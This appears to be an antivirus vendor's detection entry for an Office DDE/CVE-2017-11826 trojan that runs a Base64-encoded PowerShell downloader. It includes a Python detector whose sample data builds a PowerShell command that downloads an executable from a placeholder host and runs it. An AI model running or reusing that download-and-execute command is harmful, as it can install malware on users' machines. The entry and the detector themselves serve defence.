MSWord/DDE.4433!tr
Analysis
MSWord/DDE.4433!tr is a generic detection for a trojan/exploit PowerShell downloader.
Since this is a generic detection, malware that is detected as MSWord/DDE.4433!tr may have varying behaviour.
Below are examples of some of its characteristics/behaviours:
- Using the MS Office exploit CVE-2017-11826, this malware attempts to issue a PowerShell command that downloads a file from hxxp://bwo{Removed}.be/JHhdg33 and then executes it.
- At the time of our tests, the downloaded file, saved to %Temp%\theyweare64.exe, was detected as W32/Kryptik.FYAD!tr.
- The malware Base64-encodes its PowerShell command-line parameter to hide the actual command.
- Below is an illustration of an infected document:
Figure 1: Infected document.
Figure 2: The PowerShell script in the infected document.
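The Base64-encoded PowerShell parameter described above is what a defender can unwrap and inspect in process-creation telemetry. The following Python is an added example, not Fortinet's code: it decodes an -EncodedCommand argument, looks for the download-then-execute indicators this entry describes, and treats an Office parent process as aggravating. The sample events, the placeholder domain, the parent-process set and the token list are constructed assumptions.

```python
import base64
import re

# Strings that, in a decoded PowerShell command line, point to the
# download-then-execute behaviour described in this entry (assumed list).
SUSPICIOUS_TOKENS = ("WebClient", "DownloadFile", "DownloadString",
                     "Invoke-Expression", "IEX", "Start-Process")
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}  # assumed set
# -e, -ec, -enc and -EncodedCommand all take a Base64 blob of UTF-16LE text.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(parent_image, cmdline):
    """Classify one process-creation event (parent image name, command line)."""
    decoded = decode_encoded_command(cmdline)
    hits = [t for t in SUSPICIOUS_TOKENS if decoded and t.lower() in decoded.lower()]
    office_parent = parent_image.lower() in OFFICE_PARENTS
    # Encoded PowerShell spawned by an Office application, or a decoded
    # command that both fetches and runs something, is worth an alert.
    alert = (office_parent and decoded is not None) or len(hits) >= 2
    return {"verdict": "alert" if alert else "ok", "decoded": decoded,
            "indicators": hits, "office_parent": office_parent}

def _encode(ps):
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")

# Constructed sample events; the encoded blob is generated here from a plain
# string that mirrors the behaviour in this entry, with a placeholder domain.
SAMPLE_EVENTS = [
    ("WINWORD.EXE", "powershell.exe -NoP -W Hidden -enc " + _encode(
        "(New-Object Net.WebClient).DownloadFile('http://placeholder.invalid/JHhdg33',"
        "\"$env:TEMP\\theyweare64.exe\"); Start-Process \"$env:TEMP\\theyweare64.exe\"")),
    ("explorer.exe", "powershell.exe -enc " + _encode("Get-Date")),
    ("explorer.exe", "powershell.exe -Command Get-Process"),
]

def scan(events):
    return [triage(parent, cmd) for parent, cmd in events]
```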
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
Product | Availability
---|---
FortiGate | Extended
FortiClient | Extreme
FortiAPS |
FortiAPU |
FortiMail | Extreme
FortiSandbox | Extreme
FortiWeb | Extreme
Web Application Firewall | Extreme
FortiIsolator | Extreme
FortiDeceptor | Extreme
FortiEDR |
Version Updates
Date | Version | Detail
---|---|---
2023-02-27 | 91.00975 |